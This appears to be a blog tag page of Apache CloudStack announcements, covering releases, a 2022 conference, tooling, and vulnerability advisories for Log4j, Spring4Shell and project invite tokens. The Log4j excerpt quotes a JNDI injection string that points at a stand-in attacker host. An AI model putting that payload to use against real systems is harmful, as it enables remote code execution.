74 posts tagged with "announcement"

Apache CloudStack 4.17 is the latest release of the cloud management platform from the Apache Software Foundation and is a result of months of work from the development community. Apache CloudStack 4.17 is an LTS (Long Term Support) release so will be maintained for a period of 18 months after release.

For the 10^th consecutive year, the Apache CloudStack community is organising its major event - CloudStack Collaboration Conference, running from 14^th to 16^th November 2022. The event will be a hybrid event, giving attendees and speakers the option to join in Sofia, Bulgaria (Exact location TBD) or remotely from their computers. By doing so, the conference will allow more people from the Apache CloudStack community and people interested in the technology, to learn more about it and its latest capabilities and integrations.

At the beginning of April 2022, vulnerabilities in the Spring Framework for Java were publicly revealed. Many companies noticed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965. This vulnerability allows hackers to execute the Mirai botnet malware. The exploit allows threat actors to download the Mirai sample to the /tmp folder and execute them after changing its execute permission using chmod.

Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite.

The Apache CloudStack project is pleased to announce the release of CloudStack 4.16.1.0. The CloudStack 4.16.1.0 release is a maintenance release as part of its 4.16.x LTS branch and contains more than 150 fixes and improvements since the CloudStack 4.16.0.0 release. Some of the highlights include:

Apache CloudStack is proven to be one of the most scalable, free and open-source cloud computing operating systems for large-scale private, public, and hybrid clouds. Terraform is an open-source infrastructure as code software tool that provides a consistent CLI workflow to manage resources in many cloud services.

On 9th December 2021, a new zero-day vulnerability for Apache Log4j was reported. It is by now tracked under CVE-2021-44228:

CVE-2021-44228 vulnerability is classified under the highest severity mark and allows an attacker to execute arbitrary code by injecting a sub-string in the form "${jndi:ldap://some.attacker-controlled.site/}" into a logged message. Apache Log4j 2.x is reported to be affected as it performs a lookup (string substitution) using the JNDI protocol, whenever the "${jndi:...}" string is found within a message parameter.

"In the past years, CloudStack has been proving a mature and easy-to-use platform. The released 4.16.0.0 LTS adds new features, enhancements, and bug fixes that will help tech-savvy companies stay up to date." said Gabriel Brascher, Vice President of Apache CloudStack.

Apache CloudStack, proven as one of the most scalable, free, and open source cloud computing operating system for large scale private, public, and hybrid clouds, today announced the availability of the latest release of Apache CloudMonkey v6.2.0, the latest version of the turnkey enterprise Cloud orchestration platform's command line interface tool.

The Apache CloudStack project is pleased to announce the release ofCloudStack 4.15.2.0.

The CloudStack 4.15.2.0 release is a maintenance release as part of its 4.15.x LTS branch and contains more than 75 fixes and improvements since the CloudStack 4.15.0.0 release.